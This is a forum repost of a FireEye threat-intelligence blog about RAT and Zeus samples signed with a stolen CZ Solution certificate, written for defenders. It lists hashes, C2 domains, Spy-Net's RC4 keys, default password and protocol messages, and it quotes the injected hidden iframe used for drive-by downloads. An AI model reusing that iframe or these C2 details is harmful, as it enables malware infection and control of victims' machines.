Auteur Sujet: [FireEye]The Little Signature That Could: The Curious Case of CZ Solution  (Lu 169 fois)

0 Membres et 1 Invité sur ce sujet

Hors ligne igor51

  • Admin
  • Mega Power Members
  • *****
  • Messages: 10278
The Little Signature That Could: The Curious Case of CZ Solution

Malware authors are always looking for new ways to masquerade their
  actions. Attackers are looking for their malware to be not only fully
  undetectable, but also appear valid on a system, so as not to draw
  attention. Digital signatures are one way malware authors keep under
  the radar. Digital signatures are an easy, quick way to verify the
  authenticity of an application utilizing the signature.


Threat actors routinely steal digital signing certificates to hide in
  plain sight. There are recent reports of banking Trojans     href="https://blogs.comodo.com/e-commerce/comodo-av-labs-id-zeus-trojan/">such
    as Zeus, using valid signatures to get past both automated and
  human defenses. Part of performing accurate threat intelligence is
  continually looking to the past to help better predict the future.
  This is proven in the samples we will be discussing in this blog. Many
  of the samples throughout this blog are from the summer of 2013. These
  particular samples however, piqued our interest because of the mass
  distribution of RATs in a particular targeted region. It also reminded
  us of a recent     href="/content/fireeye-www/en_US/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html">XtremeRAT
    blog we published earlier in 2014.



  The Little Signature That Could


While investigating an uptick in Spy-Net spam campaigns, we came
  across a malware binary that was digitally signed that struck our
  interest. Spy-Net allows an attacker to interact with the victim via a
  remote shell to upload/download files, interact with the registry,
  running processes and services as well as capture images of the
  desktop and record form the webcam and audio. It also contains
  functionality to extract saved passwords and turn the victim into a
  proxy server. During the build process, an attacker can choose to
  enable a keylogger and evasion functionality designed to stop the
  information process if a debugger or virtual machine is found.


We noticed that one of the Spy-Net binary files, sc2.exe (MD5:
  6a56f6735f4b16a60f39b18842fd97d0), upon closer inspection, was
  utilizing a valid digital signature, from a company called CZ Solution
  Co. Ltd.



        class="aligncenter  wp-image-5960 portrait-sm" alt="cz1"
      src="https://www.fireeye.com/content/dam/legacy/blog/2014/07/cz1.png"
      width="306" height="374" />


Figure 1: Signature Details of sc2.exe


Looking closer at the signature, we noticed that all of the details
  were intact, and appeared to be valid. There are two additional
  code-signing certificates issued to CZ Solution Co. Ltd.



        class="aligncenter  wp-image-5959 portrait-sm" alt="cz2"
      src="https://www.fireeye.com/content/dam/legacy/blog/2014/07/cz2.png"
      width="310" height="360" />


Figure 2: Additional Signature Details


Investigation of sc2.exe showed typical Spy-Net behaviors. The sample
  beaconed out to ekinox.no-ip.info. From here, we decided to
  pivot off the CZ Solution signature and see what we could find.



  Connections Emerge


As we started to pivot off the CZ Solution signature, we started to
  see some interesting commonalities. Pivoting proved that the CZ
  Solution signature was not just used in Spy-Net binaries. We quickly
  found that this signature was being used with XtremeRAT, a popular RAT
  that cybercriminals and targeted attackers use regularly. The code of
  XtremeRAT is shared amongst several other Delphi RAT projects
  including Spy-Net, CyberGate, and Cerberus.


XtremeRAT allows an attacker to:



     
  • Interact with the victim via a remote shell

  •  
  • Upload/download files

  •  
  • Interact with the registry

  •  
  • Manipulate running processes and services

  •  
  • Capture images of the desktop

  •  
  • Record from connected devices, such as a webcam or microphone

One binary for instance, m.exe (MD5:
  c27232691dacf4cff24a4d04b3b2896b) which was XtremeRAT, was seen
  beaconing out to http://omegaphotography.[co].uk,
  batardchris.servehttp.com /1234567890.functions, and www.batteurmag.com/[plugin].xtr.


Likewise, we saw multiple samples of the Zeus Trojan utilizing the CZ
  Solution signature. Zeus modifiers can tune Zeus to steal information
  they are interested in; typically login credentials for     title="Social network"
    href="https://en.wikipedia.org/wiki/Social_network">online social
    networks,     href="https://en.wikipedia.org/wiki/E-mail_account">e-mail
    accounts
    href="https://en.wikipedia.org/wiki/Online_banking">online
  banking
 or other online financial services. Zeus is commonly seen
  targeting customers of financial institutions.


One of the Zeus samples, uk.exe (MD5:
  dcd3e45d40c8817061f716557e7a05b6) that was utilizing the CZ Solution
  signature, was beaconing out to claire-morin.com/file.php.


Looking at the three samples show that CZ Solution was used to create
  and sign Spy-Net, XtremeRAT, and Zeus samples. Graphing out the
  connections between the samples we profiled, you can quickly see how
  fast this web of similarities continue.



        class="aligncenter size-full wp-image-5958 landscape-lg" alt="cz3"
      src="https://www.fireeye.com/content/dam/legacy/blog/2014/07/cz3.png"
      width="1047" height="304" />
Figure 3: Connection Profile of
  Binaries Using CZ Solution



  The French Connection and C2 overlap


Attribution of actors and/or campaigns can often be a difficult and
  tedious task. However, since we were dealing with so many
  inter-twining binaries, we could start to draw some parallels between samples.


When looking at the overall connections between the CZ solution
  signature, you can start to see a trend emerge.  First, there is some
  C2 overlap. For instance Dllsv.exe (MD5:
  3f042fd6b9ce7e23b3c84c6f7323dd75) communicates out to
  ekinox.no-ip.info, using the same CZ Solution cert. This malware is
  flagged as BozokRAT; a user-friendly RAT that can upload and download
  files to and from a computer, modify registry entries, and perform
  other typical RAT functions. That same C2, ekinox.no-ip.info, is also
  seen used by the aforementioned Spy-Net binary, sc2.exe (MD5: 6a56f6735f4b16a60f39b18842fd97d0).


In another example of C2 overlap, a file named uk.exe, (MD5:
  9c11ef09131a3373eef5c9d83802d56b) uses its C2 as
  omega-photography.co.uk. This sample is an active Zeus binary. That
  same C2 is used with a file named x.exe, (MD5:
  c27232691dacf4cff24a4d04b3b2896b), an active XtremeRAT binary.


Next, we needed to identify at least one infection vector to ensure
  we could track how one of the binaries using the CZ Solution signature
  was getting into environments.


In one case, we found the infection vector for an XtremeRAT binary
  that was using the CZ Solution certificate. The binary came in the
  form of phished email (MD5: 7c00ba0fcbfee6186994a8988a864385)
  purportedly from Armani regarding an order.



        class="wp-image-5965 aligncenter landscape-med" alt="cz4"
      src="https://www.fireeye.com/content/dam/legacy/blog/2014/07/cz4.png"
      width="629" height="307" />


The email was in French and the headers
  were interesting, as the same sender has been     href="http://www.projecthoneypot.org/ip_212.227.126.130">seen in
    multiple French spam runs.



        class="wp-image-5964 aligncenter landscape-med" alt="cz5"
      src="https://www.fireeye.com/content/dam/legacy/blog/2014/07/cz5.png"
      width="512" height="107" />


The attachment in the email is using the   href="http://blog.malwarebytes.org/online-security/2014/01/the-rtlo-method/">RTLO
  trick to disguise a 7zip file as a PDF.


While looking at the all the samples we correlated and pivoted off
  of, we found that a majority of both the language and C2’s being used
  all revolved around the French language. The domains that were part of
  the C2 infrastructure were almost all exclusively French, as was the
  registrant information for the domains in question.



  Spy-Net C2 Protocol Analysis



As we have already shared some analysis details of XtremeRAT in a     href="/content/fireeye-www/en_US/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html">previous
  blog, we decided to share some information and tools we built
  regarding Spy-Net this time. This information is based on our analysis
  of Spy-Net version 2.6 specifically. Other versions of Spy-Net may
  have significant changes to the protocol. Spy-Net 2.6 utilizes a
  homegrown protocol like many other publicly available RATs. It’s an
  ASCII based, pipe-delimited protocol utilizing Portuguese keywords
  that employs two totally different forms of obfuscation: one for
  outbound communication to the attacker and another for inbound
  communication to the implant. The outbound communications are
  compressed with zlib and encrypted with RC4. The RC4 key is hard-coded
  and is updated with version changes. For example, the RC4 key for
  Spy-Net 2.6 is njkvenknvjebcddlaknvfdvjkfdskv, while for
  CyberGate 1.07, which has a similar (if not the same) protocol the key
  is njgnjvejvorenwtrnionrionvironvrnvcg107 and CyberGate 1.18’s
  key is njgnjvejvorenwtrnionrionvironvrnvcg117.


The astute reader may have noticed that the last three numbers of the
  CyberGate keys (roughly) represent the version number of CyberGate.
  The inbound communication to the implant employs an ASCII encoding
  scheme similar to Base64.  This protocol begins with a simple
  authentication scheme where the implant sends an authentication
  password that is validated by the client. This password is
  configurable by the attacker and defaults to abcd1234.  The
  implant then proceeds to send the entirety of its configuration
  information, as configured by the attacker, to the client so it can be
  displayed on its “Configuration” tab.



  Authentication



  Implant->Client: mypassword|Y|



  Configuration Request and Response



  Client->Implant: configuracoesdoserver|



  Implant->Client:
 
configuracoesdoserver|configuracoesdoserver|192.168.1.2:81|#myID|mypassword|C:\WINDOWS\install\server.exe|C:\Program
  Files\Internet Explorer\iexplore.exe| |
  |{0OP8GNN1-GIWW-CC7M-AJ0I-6Y554UOJJ241}|Policies|FALSE|TRUE|TRUE|TRUE|***MUTEX***|
  | |TRUE|FALSE| | | | | | |FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|server.exe#crack.exe#|FALSE|


The outbound communications from the implant to the client are
  prepended with an ASCII representation of the length of the payload
  followed by a pipe character and a new line character.



        class="wp-image-5963 aligncenter landscape-med" alt="cz6"
      src="https://www.fireeye.com/content/dam/legacy/blog/2014/07/cz6.png"
      width="540" height="116" />


There is a noticeable lack of
  sophistication in Spy-Net’s code. For example, in some cases the
  length indicator is followed by a pipe and a single new line (\n)
  character as seen in *nix based operating systems. In other cases, the
  indicator is followed by the carriage return and new line characters
  (\r\n), as seen in Windows operating systems. This lack of conformity
  is also witnessed in how there are two totally different schemes used
  for obfuscation, and in how obfuscation is not used for file transfers
  as it is otherwise used throughout the protocol.



  Spy-Net Protocol Decoder


Since Spy-Net is a publicly available RAT that we see in use quite
  often, we decided to build a ChopShop module for it and share it in
  cooperation with our friends at MITRE.  The module is now available as
  a standard part of the framework     href="https://github.com/MITRECND/chopshop">available on GitHub.
   We are also sharing a     href="https://github.com/fireeye/pycommands">Spy-Net configuration
    dumping pycommand for Immunity Debugger.  While hunting for
  related samples in VirusTotal, we came across a pcap that had captured
  the initial infection and subsequent communication of the Spy-Net
  binary we initially mentioned, (MD5:
  6a56f6735f4b16a60f39b18842fd97d0). This gave us a great opportunity to
  test our new decoder. One thing that Spy-Net implants will commonly
  send out automatically is a thumbnail image of the user’s desktop.
  This is displayed on the client.



        class="wp-image-5962 aligncenter landscape-med" alt="cz7"
      src="https://www.fireeye.com/content/dam/legacy/blog/2014/07/cz7.png"
      width="539" height="160" />


Our decoder can extract such images from
  the pcap and what we found gave us a further hint that we may be
  dealing with attacks focused in France. Although difficult to read due
  to the very low resolution of the thumbnail, our pcap decoder was able
  to tell us that the title of the browser window currently open in this
  screenshot is “Football - MAXIFOOT l'actualit  foot et transfert -
  Windows Internet Explorer.”



 
            class="size-full wp-image-5961 aligncenter landscape-sm"
        alt="cz8"
        src="https://www.fireeye.com/content/dam/legacy/blog/2014/07/cz8.png"
        width="205" height="205" />



  Distribution via Malicious Java Applet


According to the details of the pcap we decoded, this French football
  Web site (maxifoot.fr) was apparently compromised and had an iframe
  inserted into it that pointed to another compromised Web site, a
  Canadian addiction recovery resource: unwasted.ca.


<iframe width="1px" height="1px"
  src="hxxp://unwasted.ca/skins/index.html"
  style="display: block;" ></iframe>


The latter site hosted a malicious Java applet that downloaded the
  Pony/Fareit malicious downloader. The downloader then proceeded to
  install ZeuS and download and execute the aforementioned Spy-Net
  binary. All of these binaries were signed with the stolen digital
  certificate. The malicious Java applet used to install the Pony
  downloader was created by Foxxy Software and had been previously     href="http://www.welivesecurity.com/2012/08/07/foxxy-software-outfoxed/">written
    about by ESET.



  RAT Configuration Details


We assembled a compilation of the meaningful configuration data found
  in the XtremeRAT and Spy-Net samples we came across in our analyses.
  You can observe some similarities between the samples’ configurations.




 


 


 

   
     


     


       


     


       


         


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


     


       


         


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


     


       


         


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


     


       


         


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


     


       


         


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


     


       


         


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


     


       


         


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


     


       


         


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


     


       


         


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


     


       


         


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


       


         
           


     


     


     

MD5
Version
Dir/Path
ID
Group
Mutex
Password
f5e6c0a2c9000311513521947a76cb4b
Spy-Net 2.6
C:\WINDOWS\system32\conhost\conhost.exe
Updater2014
NA
R5438NM5
abcd1234
6a56f6735f4b16a60f39b18842fd97d0
Spy-Net 2.6
C:\WINDOWS\system32\Winini\taskhost.exe
Uframer
NA
A7TF5W
abcd1234
7416ec2889227f046f48c15c45c102da
XtremeRAT 3.5 Private
InstallDir
SpaM
SPAM
eyA8znpc
NA
2e776e18dec61cf6ccd68fbacd55fab3
XtremeRAT 3.5 Private
svhost
Diesel
Diesel
lNFAH0
NA
be47ec66d861c35784da527bf0f2e03a
XtremeRAT 3.5 Private
svhost
IdSec
USA3
lNFAH0
NA
c27232691dacf4cff24a4d04b3b2896b
XtremeRAT 3.5 Private
InstallDir
IdSec
idsection
eyA8znpc
NA
e79636e4c7418544d188a29481c100bb
XtremeRAT 3.5 Private
svhost
IdSec
USA3
lNFAH04
NA
bd70a7cae3ebf85cf1edd9ee776d8364
XtremeRAT 3.5 Private
svhost
IdSec
IdSec
lNFAH0
NA
0be3b0e296be33903bf76b8cd9cf52ca
XtremeRAT 3.5 Private
svhost
CiTa
IdSec
x4KybsbM
NA

 


 




  Conclusion


The usage of digital signatures isn’t going to decrease anytime soon-
  especially by threat actors. It gives them a quick, easy way to bypass
  traditional security controls since certificates and signatures are
  typically trusted by default. In this blog, we are shown that this
  trend still true. We looked towards the past in this blog, to better
  understand motivations and trends going forward. We can accurately
  say, based on the information attributed, that the CZ Solution
  signatures were being utilized by an individual or group of
  individuals using French assets and infrastructure.


These particular actors didn’t show a significant level of expertise,
  but did show collective resources with knowledge in at least Zeus,
  Spy-Net, and XtremeRAT. We can say accurately that it is likely these
  actor(s) were using the same signature to send out a wide range of
  binaries, possibly even outside of the realm of the four families
  discussed here. As we wrote this blog, we couldn’t help but be
  reminded of the spam run focused in Colombia and Central America that
  we     href="/content/fireeye-www/en_US/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html">wrote
    about back in February of this year. A spam run that is
  regionally focused, but with no apparent targeting in nature,
  utilizing a mix of ZeuS and off-the-shelf RATs.


Helping protect your organization from threats using valid digital
  signatures can include verification of the signature’s serial number.
  In this case, the serial number: 6e 7b 63 95 ac 5b 5c 8a 2a ec c4 52
  8d 9e 65 10, is the identifier to locate in regards to this publisher.
  Also, if you’re running your own internal certificate authority,
  ensure you are adequately revoking certificates that may have been
  compromised. This will help ensure compromised certificates are not
  utilized in attacks.


 


Source: The Little Signature That Could: The Curious Case of CZ Solution

Security-X


Tags: